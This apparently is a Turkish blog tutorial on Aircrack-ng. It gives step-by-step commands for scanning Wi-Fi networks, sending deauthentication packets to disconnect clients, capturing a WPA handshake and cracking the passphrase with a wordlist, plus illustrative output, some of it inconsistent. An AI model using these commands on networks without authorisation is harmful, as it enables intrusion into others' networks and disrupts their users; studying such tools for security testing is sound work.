Published on

Aircrack-ng Nedir Nasıl Kullanılır

Authors

Aircrack-ng Nedir?

Aircrack-ng, kablosuz ağlarda güvenlik testleri yapmak için kullanılan bir açık kaynaklı bir yazılım paketidir. Temel olarak, WEP ve WPA/WPA2-PSK gibi kablosuz ağ güvenlik protokollerini analiz etmek, kırarak ve çözümleyerek şifreleri çözmeyi amaçlar. Aircrack-ng, birçok farklı aracı içeren bir pakettir ve bu araçlar, kablosuz ağ güvenliğini test etmek için bir dizi işlemi gerçekleştirmek üzere tasarlanmıştır.

Aircrack-ng'nin temel özellikleri

Paket Yakalama: Aircrack-ng, kablosuz ağlardan gelen veri paketlerini yakalayabilir. Bu, ağ trafiğini analiz etmek ve ağ güvenliğini değerlendirmek için önemlidir.

WEP Kırma: Aircrack-ng, WEP (Wired Equivalent Privacy) şifreleme protokolünü kırmak için kullanılabilir. WEP, artık güvenli kabul edilmediği için bu özellik eskimiştir, ancak hala eğitim ve test amaçlarıyla kullanılabilir.

WPA/WPA2 Kırma: Aircrack-ng, WPA (Wi-Fi Protected Access) ve WPA2-PSK şifreleme protokollerini kırmak için kullanılabilir. Bu, güvenlik zayıflıklarını belirlemek ve güvenliği iyileştirmek için kullanılabilir.

Kablosuz Ağ Analizi: Aircrack-ng, kablosuz ağlarla ilgili geniş bir analiz yapabilir. Bu, ağ trafiğini incelemek, ağları keşfetmek ve güvenlik açıklarını belirlemek için kullanılabilir.

WPS Saldırıları: Aircrack-ng, Wi-Fi Protected Setup (WPS) protokolü üzerinde saldırılar gerçekleştirmek için kullanılabilir. WPS, genellikle güvenlik zayıflıklarıyla ilişkilendirilmiştir ve Aircrack-ng bu zayıflıkları test etmek için kullanılabilir.

Aircrack-ng Kurulum

sudo apt-get install aircrack-ng

Aircrack-ng, macOS ve Windows gibi diğer işletim sistemlerinde de kullanılabilir, ancak kurulum süreci biraz farklı olabilir. Bu işletim sistemleri için Aircrack-ng'nin resmi web sitesinden veya uygun paket yöneticilerinden indirilebilir ve kurulabilir.

Aircrack-ng'yi kurduktan sonra, komut satırından kullanılabilir. Başlıca araçları arasında airodump-ng (ağ trafiğini izleme), aireplay-ng (paket enjeksiyonu) ve aircrack-ng (şifre kırma) bulunmaktadır. Kullanımı hakkında daha fazla bilgi almak için, terminalde

aircrack-ng --help 

komutunu kullanabilir veya Aircrack-ng belgelerini inceleyebilirsiniz.

Aircrack-ng Nasıl Kullanılır?

  1. airodump-ng:

Ağ trafiğini izlemek, kablosuz ağları taramak ve yakındaki erişim noktalarını listelemek için kullanılır. Örnek Kullanım:

airodump-ng wlan0
  1. aireplay-ng:

Paket enjeksiyonu için kullanılır. Bu, ağdaki trafiği manipüle etmek için kullanılır ve bazı saldırılar için gereklidir. Örnek Kullanım:

aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0
  1. aircrack-ng:

Şifre kırma aracıdır. Elde edilen WEP/WPA/WPA2 şifrelerini kırmak için kullanılır. Örnek Kullanım (WEP):

aircrack-ng -b AA:BB:CC:DD:EE:FF captured_data.cap

Örnek Kullanım (WPA/WPA2):

aircrack-ng -w wordlist.txt captured_data.cap 
  1. Gerçekleştirilecek Adımlar:
  • İlk olarak, airodump-ng komutuyla hedeflenen kablosuz ağı belirleyin ve trafiği izleyin.
  • Ardından, airodump-ng komutuyla hedeflenen ağın ESSID'sini ve BSSID'sini (MAC adresi) belirleyin.
  • İsteğe bağlı olarak, aireplay-ng komutunu kullanarak paket enjeksiyonu gerçekleştirin ve ağ trafiğini manipüle edin.
  • Son olarak, aircrack-ng komutunu kullanarak şifreyi kırmak için elde edilen veri dosyasını ve bir şifre listesini (wordlist) belirtin.
  1. Wordlist Hazırlama:

Aircrack-ng ile WPA/WPA2 şifre kırma yapacaksanız, kullanılacak bir wordlist (şifre listesi) oluşturmanız gerekebilir. Bu, çeşitli şifreleri denemek için kullanılır.

Önemli Notlar:

Aircrack-ng gibi araçların yalnızca yasal ve etik amaçlar için kullanılması gerekmektedir. Aircrack-ng, güvenliği zayıf olan ağları tespit etmek ve iyileştirmek için kullanılmalıdır. Bilgi hırsızlığı veya izinsiz erişim gibi kötü niyetli amaçlarla kullanılması yasa dışıdır ve ciddi sonuçları olabilir.

Aircrack-ng'nin temel kullanımına yönelik bir örnek

Diyelim ki "mafsec_wifi" adında bir kablosuz ağa sahip olduğumuzu ve bu ağın BSSID'sinin "AA:BB:CC:DD:EE:FF" olduğunu varsayalım. Ağda WPA/WPA2 şifreleme kullanıldığını düşünelim ve şifreyi kırmak istiyoruz. Ayrıca, şifreyi kırmak için kullanılacak bir wordlist dosyamızın olduğunu farz edelim.

1. Öncelikle, airodump-ng aracını kullanarak hedeflenen kablosuz ağı belirleyeceğiz ve trafiği izleyeceğiz:

airodump-ng wlan0

Bu komut çıktısında "mafsec_wifi" adındaki ağın BSSID'sini ve diğer bilgileri görebiliriz.

CH  6 ][ Elapsed: 10 s ][ 2024-04-03 16:30 ][ WPA handshake: AA:BB:CC:DD:EE:FF ][ WPA2 CCMP PSK - Network: mafsec_wifi ][ LANforgeWiFi ]
     
BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

AA:BB:CC:DD:EE:FF  -43      60       15    2   6  54e  WPA2  CCMP   PSK  mafsec_wifi
11:22:33:44:55:66  -55      40       10    1   6  54e  WPA2  CCMP   PSK  my_wifi
22:33:44:55:66:77  -60      30        5    0   6  54e  WPA   CCMP   PSK  home_wifi
33:44:55:66:77:88  -70      20        3    0   6  54e  WPA2  CCMP   PSK  office_wifi
  • CH: Kanal numarasını gösterir.
  • Elapsed: Komutun çalışma süresini gösterir.
  • 2024-04-03 16:30: Zaman damgasını gösterir.
  • WPA handshake: WPA şifre el sıkışması olduğunu belirtir.
  • WPA2 CCMP PSK: Kullanılan güvenlik protokollerini gösterir.
  • Network: Kablosuz ağın adını (ESSID) gösterir.
  • BSSID: Kablosuz ağın MAC adresini gösterir.
  • PWR: Sinyal gücünü (dBm cinsinden) gösterir.
  • Beacons: Beacon (işaret) paketlerinin sayısını gösterir.
  • #Data, #/s: Veri paketlerinin sayısını ve saniyede alınan paketlerin ortalama sayısını gösterir.
  • MB: Maksimum bağlantı hızını (megabit/saniye cinsinden) gösterir.
  • ENC: Şifreleme türünü (WEP, WPA, WPA2) gösterir.
  • CIPHER: Kullanılan şifreleme algoritmasını gösterir.
  • AUTH: Kimlik doğrulama yöntemini (örneğin, PSK) gösterir.
  • ESSID: Kablosuz ağın adını gösterir.

2. Ardından, hedeflenen ağı ve istasyonları belirterek airodump-ng'yi başka bir terminal penceresinde çalıştıracağız.

airodump-ng --bssid AA:BB:CC:DD:EE:FF -c <kanal_numarası> -w captured_data wlan0

Burada <kanal_numarası> yerine hedeflenen ağın kanal numarasını ve captured_data ise yakalanan veri paketlerinin kaydedileceği dosya adını belirtiyoruz.

3. aireplay-ng aracını kullanarak paket enjeksiyonu gerçekleştirebiliriz.

aireplay-ng -0 50 -a AA:BB:CC:DD:EE:FF wlan0

Bu komut, 50 adet deauthentication paketi göndererek hedeflenen istemcilerin ağdan atılmasını sağlar.

4. Son olarak, aircrack-ng aracını kullanarak şifreyi kırmak için elde edilen veri dosyasını ve wordlist dosyasını belirtiyoruz.

aircrack-ng -w wordlist.txt captured_data-01.cap

Burada wordlist.txt, kullanılacak şifre listesi dosyasını temsil eder ve captured_data-01.cap, airodump-ng tarafından kaydedilen veri dosyasının adını gösterir.

Opening captured_data-01.cap
Read 10000 packets.

   #  BSSID              ESSID                     Encryption

   1  00:11:22:33:44:55  example_wifi              WPA (1 handshake)

Choosing first network as target.

Opening captured_data-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.6

                   [00:00:00] 10000 keys tested (0.19 k/s)

                           KEY FOUND! [ password123 ]

      Master Key      : AA:BB:CC:DD:EE:FF 11:22:33:44:55:66
      Pairwise Key    : DE:AD:BE:EF:12:34
      PMK Name (SSID) : mafsec_wifi

5. Diğer.

  • Eğer kali linux üzerinden bu işlemleri yapıyorsanız (deauthentication) bir wifi kart'a ihtiyacınız olacak.
  • wifi kartınızı taktıktan sonra monitör modunu destekleyen wifi kartlarınızı görmek için aşağıdaki kodu yazın.
airmon-ng
Interface   Chipset     Driver

wlan0       Intel 6205  iwlwifi - [phy0]

İnterface yazan yerin altında sizin monitor kartınızın adı yazmaktadır.

  • Monitör modu aktif etmek için aşağıdaki kodu yazın.
airmon-ng start wlan0

Ancak, aircrack-ng'nin özellikleri bununla sınırlı değildir. Daha fazla bilgi edinmek isterseniz, aircrack-ng'nin resmi web sitesinden dökümantasyonları inceleyebilirsiniz.